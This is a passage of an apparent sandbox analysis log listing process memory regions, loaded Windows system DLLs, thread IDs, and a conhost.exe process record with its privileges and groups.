	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4004
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4005
	        start_va = 0x7ef90000
	          end_va = 0x7f08ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ef90000"
	        filename = ""

Region:
	              id = 4031
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4032
	        start_va = 0x690000
	          end_va = 0x693fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000690000"
	        filename = ""

Region:
	              id = 4033
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 4034
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4035
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4036
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 4037
	        start_va = 0x580000
	          end_va = 0x58ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000580000"
	        filename = ""

Region:
	              id = 4038
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 4051
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 4052
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 4053
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 4054
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 4055
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 4056
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 4058
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 4059
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 4060
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 4061
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 4062
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 4063
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 4064
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 4070
	        start_va = 0x4880000
	          end_va = 0x494ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 4071
	        start_va = 0x6a0000
	          end_va = 0x6c9fff
	       monitored = 0
	     entry_point = 0x6a5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 4072
	        start_va = 0x740000
	          end_va = 0x83ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000740000"
	        filename = ""

Region:
	              id = 4073
	        start_va = 0x4950000
	          end_va = 0x4ad7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004950000"
	        filename = ""

Region:
	              id = 4074
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 4075
	        start_va = 0x6a0000
	          end_va = 0x6acfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 4076
	        start_va = 0x4ae0000
	          end_va = 0x4c60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004ae0000"
	        filename = ""

Region:
	              id = 4077
	        start_va = 0x4c70000
	          end_va = 0x606ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004c70000"
	        filename = ""

Region:
	              id = 4084
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 4085
	        start_va = 0x440000
	          end_va = 0x440fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 4086
	        start_va = 0x6b0000
	          end_va = 0x6b3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006b0000"
	        filename = ""

Region:
	              id = 4087
	        start_va = 0x6070000
	          end_va = 0x6159fff
	       monitored = 0
	     entry_point = 0x60ad650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 4096
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 4321
	        start_va = 0x6c0000
	          end_va = 0x6c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000006c0000"
	        filename = ""

Region:
	              id = 4322
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 4323
	        start_va = 0x6d0000
	          end_va = 0x6d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000006d0000"
	        filename = ""

Region:
	              id = 4417
	        start_va = 0x450000
	          end_va = 0x48ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000450000"
	        filename = ""

Region:
	              id = 4418
	        start_va = 0x490000
	          end_va = 0x4cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000490000"
	        filename = ""

Region:
	              id = 4426
	        start_va = 0x4d0000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004d0000"
	        filename = ""

Region:
	              id = 4427
	        start_va = 0x510000
	          end_va = 0x54ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000510000"
	        filename = ""

Region:
	              id = 4428
	        start_va = 0x590000
	          end_va = 0x5cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000590000"
	        filename = ""

Region:
	              id = 4429
	        start_va = 0x5d0000
	          end_va = 0x60ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005d0000"
	        filename = ""

Region:
	              id = 4550
	        start_va = 0x6070000
	          end_va = 0x614ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 4551
	        start_va = 0x4880000
	          end_va = 0x48fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 4552
	        start_va = 0x4940000
	          end_va = 0x494ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004940000"
	        filename = ""

Region:
	              id = 4555
	        start_va = 0x6e0000
	          end_va = 0x6e8fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 310
	os_tid = 0x338


Thread:
	id = 315
	os_tid = 0xcfc


Thread:
	id = 333
	os_tid = 0x1118


Thread:
	id = 335
	os_tid = 0xbac


Thread:
	id = 336
	os_tid = 0x1150


Process:
	id = "54"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2da21000"
	os_pid = "0x5a0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "52"
	os_parent_pid = "0xcac"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3978
	        start_va = 0x28a00000
	          end_va = 0x28bfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000028a00000"
	        filename = ""

Region:
	              id = 3979
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3980
	        start_va = 0x80689a0000
	          end_va = 0x80689dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000080689a0000"
	        filename = ""

Region:
	              id = 3981
	        start_va = 0x8068a00000
	          end_va = 0x8068bfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008068a00000"
	        filename = ""

Region:
	              id = 3982
	        start_va = 0x20fe8a20000
	          end_va = 0x20fe8a3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8a20000"
	        filename = ""

Region:
	              id = 3983
	        start_va = 0x20fe8a40000
	          end_va = 0x20fe8a54fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe8a40000"
	        filename = ""

Region:
	              id = 3984
	        start_va = 0x7df5ff6b0000
	          end_va = 0x7ff5ff6affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff6b0000"
	        filename = ""

Region:
	              id = 3985
	        start_va = 0x7ff7ff350000
	          end_va = 0x7ff7ff372fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff350000"
	        filename = ""

Region:
	              id = 3986
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 3987
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3988
	        start_va = 0x20fe8a60000
	          end_va = 0x20fe8b9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8a60000"
	        filename = ""

Region:
	              id = 3994
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 3995
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 3996
	        start_va = 0x20fe8a20000
	          end_va = 0x20fe8a2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe8a20000"
	        filename = ""

Region:
	              id = 3997
	        start_va = 0x7ff7ff250000
	          end_va = 0x7ff7ff34ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff250000"
	        filename = ""

Region:
	              id = 4007
	        start_va = 0x20fe8ba0000
	          end_va = 0x20fe8c5dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4008
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 4009
	        start_va = 0x8068c00000
	          end_va = 0x8068c3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008068c00000"
	        filename = ""

Region:
	              id = 4010
	        start_va = 0x20fe8c60000
	          end_va = 0x20fe8d8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8c60000"
	        filename = ""

Region:
	              id = 4011
	        start_va = 0x20fe8a30000
	          end_va = 0x20fe8a36fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8a30000"
	        filename = ""

Region:
	              id = 4012
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 4013
	        start_va = 0x20fe8a60000
	          end_va = 0x20fe8a60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe8a60000"
	        filename = ""

Region:
	              id = 4014
	        start_va = 0x20fe8aa0000
	          end_va = 0x20fe8b9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8aa0000"
	        filename = ""

Region:
	              id = 4015
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 4020
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 4021
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 4022
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 4023
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 4024
	        start_va = 0x20fe8a70000
	          end_va = 0x20fe8a76fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8a70000"
	        filename = ""

Region:
	              id = 4025
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 4026
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 4028
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 4029
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 4030
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 4045
	        start_va = 0x20fe8a80000
	          end_va = 0x20fe8a80fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8a80000"
	        filename = ""

Region:
	              id = 4046
	        start_va = 0x20fe8a90000
	          end_va = 0x20fe8a90fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8a90000"
	        filename = ""

Region:
	              id = 4047
	        start_va = 0x20fe8d90000
	          end_va = 0x20fe8f17fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe8d90000"
	        filename = ""

Region:
	              id = 4048
	        start_va = 0x20fe8f20000
	          end_va = 0x20fe90a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe8f20000"
	        filename = ""

Region:
	              id = 4049
	        start_va = 0x20fe90b0000
	          end_va = 0x20fea4affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000020fe90b0000"
	        filename = ""

Region:
	              id = 4050
	        start_va = 0x20fea4b0000
	          end_va = 0x20fea5dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fea4b0000"
	        filename = ""

Region:
	              id = 4067
	        start_va = 0x8068c40000
	          end_va = 0x8068c7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008068c40000"
	        filename = ""

Region:
	              id = 4068
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 4069
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 4078
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 4079
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 4080
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 4081
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 4082
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 4083
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 4091
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 4093
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 4094
	        start_va = 0x20fe8c60000
	          end_va = 0x20fe8c7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8c60000"
	        filename = ""

Region:
	              id = 4095
	        start_va = 0x20fe8d80000
	          end_va = 0x20fe8d8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fe8d80000"
	        filename = ""

Region:
	              id = 4098
	        start_va = 0x20fea5e0000
	          end_va = 0x20fea916fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 4099
	        start_va = 0x20fe8c80000
	          end_va = 0x20fe8cd9fff
	       monitored = 1
	     entry_point = 0x20fe8c953f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 4100
	        start_va = 0x20fe8ce0000
	          end_va = 0x20fe8d00fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 4101
	        start_va = 0x20fea920000
	          end_va = 0x20feab30fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fea920000"
	        filename = ""

Region:
	              id = 4102
	        start_va = 0x20feab40000
	          end_va = 0x20fead51fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020feab40000"
	        filename = ""

Region:
	              id = 4103
	        start_va = 0x20fea4b0000
	          end_va = 0x20fea5c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fea4b0000"
	        filename = ""

Region:
	              id = 4104
	        start_va = 0x20fea5d0000
	          end_va = 0x20fea5dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fea5d0000"
	        filename = ""

Region:
	              id = 4105
	        start_va = 0x20fead60000
	          end_va = 0x20feaf73fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020fead60000"
	        filename = ""

Region:
	              id = 4106
	        start_va = 0x20feaf80000
	          end_va = 0x20feb097fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000020feaf80000"
	        filename = ""

Region:
	              id = 4107
	        start_va = 0x8068c80000
	          end_va = 0x8068cbffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008068c80000"
	        filename = ""

Region:
	              id = 4108
	        start_va = 0x7ff9589e0000
